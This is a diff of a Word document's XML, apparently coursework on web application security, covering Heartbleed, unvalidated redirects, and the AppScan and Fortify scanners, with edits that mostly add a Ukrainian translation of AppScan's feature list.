+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ий</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> або Open Source-додаток - повинен перевірятися на відсутність вразливостей.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Практично кожен</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Web-додаток використовує Open Source-компоненти, наприклад, бібліотеку OpenSSL, що забезпечує TLS / SSH-шифрування Web-сайтів (HTTPS). У квітні 2014 року в декількох версіях цієї бібліотеки була виявлена критична вразливість CVE-2014-0160, відома як Heartbleed.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>10. Неперевірені перенаправлення і переходи</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Web-додатки часто перенаправляють користувачів на інші сторінки за допомогою певних параметрів. Якщо ці параметри не перевіряються, то зловмисник може обманним шляхом перенаправити користувача на шкідливу Web-сторінку, змусивши його розкрити свій пароль та інші важливі дані. Наприклад, зловмисник може створити повідомлення електронної пошти з фішинговою посиланням, що містить ім'я необхідного Web-сайту. При цьому відповідальний за перенаправлення параметр, що міститься в кінці URL-адреси, може бути не видно користувачеві, в результаті чого користувач з великою ймовірністю клацне за цим посиланням або скопіює її в Web-браузер, так як доменне ім'я в URL-адресі не викличе у нього ніяких підозр.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -25556,7 +26391,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Main features in Appscan:</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -25569,6 +26404,19 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:t>Main features in Appscan:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
         <w:br/>
       </w:r>
     </w:p>
@@ -25584,6 +26432,18 @@
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -25620,7 +26480,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Flash support: Appscan 8.0 has increased flash support compared to its earlier versions. It can now explore and test applications based on an Adobe Flex framework. </w:t>
       </w:r>
       <w:r>
@@ -25659,6 +26518,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Glass box testing: Glass box scanning is a new feature introduced in Appscan. This process installs an agent on the server which helps find hidden URLs and additional issues.</w:t>
       </w:r>
     </w:p>
@@ -26379,8 +27239,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t xml:space="preserve">Из особенностей продукта стоит выделить наличие в HP Fortify Static Code Analyzer поддержки интеграции с различными системами управления разработкой и отслеживания ошибок. Если разработчик программного кода </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Из особенностей продукта стоит выделить наличие в HP Fortify Static Code Analyzer поддержки интеграции с различными системами управления разработкой и отслеживания ошибок. Если разработчик программного кода предоставляет заказчику доступ к прямой передаче сообщений об ошибках в Bugzilla, HP Quality Center или Microsoft TFS, анализатор может автоматически создавать сообщения об ошибках в этих системах без необходимости ручных действий. Работа продукта основана на собственных базах знаний HP Fortify, сформированных адаптацией базы CWE. В продукте реализован анализ на выполнение требований DISA STIG, FISMA, PCI DSS и рекомендаций OWASP.</w:t>
+        <w:t>предоставляет заказчику доступ к прямой передаче сообщений об ошибках в Bugzilla, HP Quality Center или Microsoft TFS, анализатор может автоматически создавать сообщения об ошибках в этих системах без необходимости ручных действий. Работа продукта основана на собственных базах знаний HP Fortify, сформированных адаптацией базы CWE. В продукте реализован анализ на выполнение требований DISA STIG, FISMA, PCI DSS и рекомендаций OWASP.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -31165,7 +32035,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{740880D6-EE86-4E82-AC72-5D9FA9414C9D}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{55F10CF0-A310-4ABB-9178-555DF61AC711}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -24752,6 +24752,7 @@
           <w:color w:val="2A2A2A"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -24765,6 +24766,720 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>AppScan</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Основні можливості </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>AppScan:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Підтримка </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Flash</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> завдяки цьому він може тестувати додатки побудовані на базі </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Adobe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Flex</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>framework</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Протокол </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>AMF</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>також підтримується.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Тестування прозорого ящика: суть полягає у встановленні спеціального агенту, який допомагає </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">відшукати приховані </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>URl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-адреси та </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>інші дефекти.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>С</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>канування веб-служб: сканування веб-служби є однією з областей</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>, необхідних організаціям для більш ефективної автоматизації.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Аналізатор безпеки </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>JavaScript</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Appscan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> дозволяє аналізувати </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>html</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
